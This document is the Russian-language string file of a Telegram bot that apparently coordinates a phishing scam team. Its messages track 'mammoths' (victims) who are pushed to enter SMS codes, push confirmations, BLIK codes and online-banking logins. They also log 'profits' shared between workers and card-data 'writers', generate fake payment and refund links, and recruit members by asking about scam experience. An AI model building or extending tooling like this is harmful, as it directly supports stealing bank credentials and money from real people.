module.exports = {
  statuses: {
    sms: "📥 СМС-КОД",
    lk: "🔐 ЛК",
    push: "📱 ПУШ",
    blik: "#️⃣ БЛИК",
    appCode: "📬 КОД С ПРИЛОЖЕНИЯ",
    callCode: "☎️ КОД ИЗ ЗВОНКА",
    picture: "🖼 КАРТИНКА",
    limits: "⚠️ ЛИМИТЫ",
    otherCard: "⚠️ ДРУГАЯ КАРТА",
    correctBalance: "⚠️ ТОЧНЫЙ БАЛАНС",
    forVerify: "⚠️ НУЖЕН БАЛАНС",
  },
  workerStatuses: {
    push: "📲 Вашему мамонту отправили ПУШ",
    sms: "📤 Вашему мамонту отправили СМС-КОД",
    lk: "🔐 Вашего мамонта отправили на ЛК",
    blik: "📩 Вашему мамонту отправили БЛИК",
    callCode: "☎️ Вашему мамонту отправили звонок с кодом",
    appCode: "📬 Вашему мамонту отправили код в приложение",
    picture: "🖼 Вашему мамонту отправили картинку",
    limits: "⚠️ Ваш мамонт должен поднять лимиты",
    otherCard: "⚠️ Ваш мамонт должен ввести другую карту",
    forVerify: "⚠️ У вашего мамонта должен быть баланс на карте",
    correctBalance: "⚠️ Ваш мамонт должен ввести точный баланс",
  },
  wrongWorkerStatuses: {
    code: "❌ Ваш мамонт ввёл неверный КОД",
    lk: "❌ Ваш мамонт ввёл неверные данные от ЛК",
    picture: "❌ Ваш мамонт выбрал неверную КАРТИНКУ",
    push: "❌ Ваш мамонт не подтверждает ПУШ",
  },
  newProfit: {
    channel: `<b>💰 НОВЫЙ ПРОФИТ {serviceTitle}</b>
🆔 ID: <b>{profitId}</b>
💸 Сумма: <b>{amount}</b>
💴 Процент воркера: <b>{workerAmount}</b>
👤 Воркер: <b>{worker}</b>
✍️ Вбивер: <b>{writer}</b>`,
    wait: "⏳ В ожидании",
    payed: "✅ Выплачено",
    razvitie: "🌎 На развитие",
    worker: `<b>🎉 Вам засчитан профит #{profitId} в размере {amount}</b>
💰 Ваш процент: <b>{workerAmount}</b>
✍️ Вбивер: <b>{writer}</b>`,
  },
  myAd: {
    text: `<b>📦 Объявление {service}</b>

💬 Название: <b>{title}</b>
💰 Цена: <b>{price}</b>
📰 Имя: <b>{name}</b>
📱 Телефон: <b>{phone}</b>
🏡 Адрес: <b>{address}</b>
💸 Чекер баланса: <b>{balanceChecker}</b>

🔗 Получение оплаты: <b>{fakeLink}</b>
🔗 Возврат: <b>{refundLink}</b>`,
  },
  now_writers: "✍️ Сейчас на вбиве:",
  chat_list: "💬 Список чатов",
  payouts: "💸 Выплаты",
  workers: "👥 Воркеры",
  top_workers: "🏆 Топ воркеров",
  top_null: "🔍 В топе ещё никого нету",
  mainMenu: {
    text: `<b>👻 Ты попал в главное меню!</b>
🆔 Твой ID: <code>{id}</code>
📦 Активных объявлений: <b>{ads_count}</b>
📰 Статус: <b>{status}</b>
💰 Профитов: <b>{profits_count}</b>
🏦 Сумма профитов: <b>{profits_sum}</b>
👀 Никнейм: <b>{hide_nick}</b>

<b>📅 Ты с нами уже {with_us}</b>`,
    buttons: {
      create_link: "🔗 Создать ссылку",
      my_ads: "📦 Мои объявления",
      my_profits: "💰 Мои профиты",
      writer: "✍️ Кто на вбиве",
      workers_top: "🏆 Топ воркеров",
      chats: "💬 Чаты",
      settings: "⚙️ Настройки",
      send_sms: "📤 Отправить СМС мамонту",
      parse: "🤖 Спарсить объявления",
      my_parsings: "🗃 Мои парсинги",
    },
  },
  choose_country: "🌎 Выберите страну",
  choose_service: "📦 Выберите сервис",
  go_to_menu: "◀️ В меню",
  go_back: "◀️ Назад",
  roles: {
    admin: "Администратор 👑",
    writer: "Вбивер ✍️",
    worker: "Воркер 👷",
    pro: "Профи ☄️",
  },
  requests: {
    need_send_request:
      "<b>ℹ️ Для использования бота необходимо подать заявку. Вы готовы?</b>",
    ready_send_button: "✅ Я готов! Перейти к заполнению заявки",
    wait_request_process: "⏳ Ожидайте рассмотрения вашей заявки",
    done: "✅ Заявка отправлена на рассмотрение администраторами!",
    accepted: "🎉 Поздравляем, ваша заявка принята!",
    declined: "😞 Ваша заявка была отклонена",
    steps: [
      {
        request_text: "Откуда узнал",
        scene_text: `☺️ Хорошо, приступаем к заполнению заявки. Первый вопрос:

<b>Откуда вы узнали о нашей тиме?</b>`,
      },
      {
        request_text: "Какой опыт",
        scene_text: `👍 Отлично! Второй вопрос:

<b>Имеется ли у вас опыт работы в скаме?</b>`,
      },
      {
        request_text: "Сколько времени готов уделять",
        scene_text: `✌️ И последний вопрос:

<b>Сколько времени Вы готовы уделять этой работе?</b>`,
      },
    ],
  },
  your_account_banned: "❌ Ваш аккаунт заблокировали",
  newChatMemberText: "🥳 Добро пожаловать в чат нашего проекта, {username}!",
  mainMenu_button: "Главное меню"
};
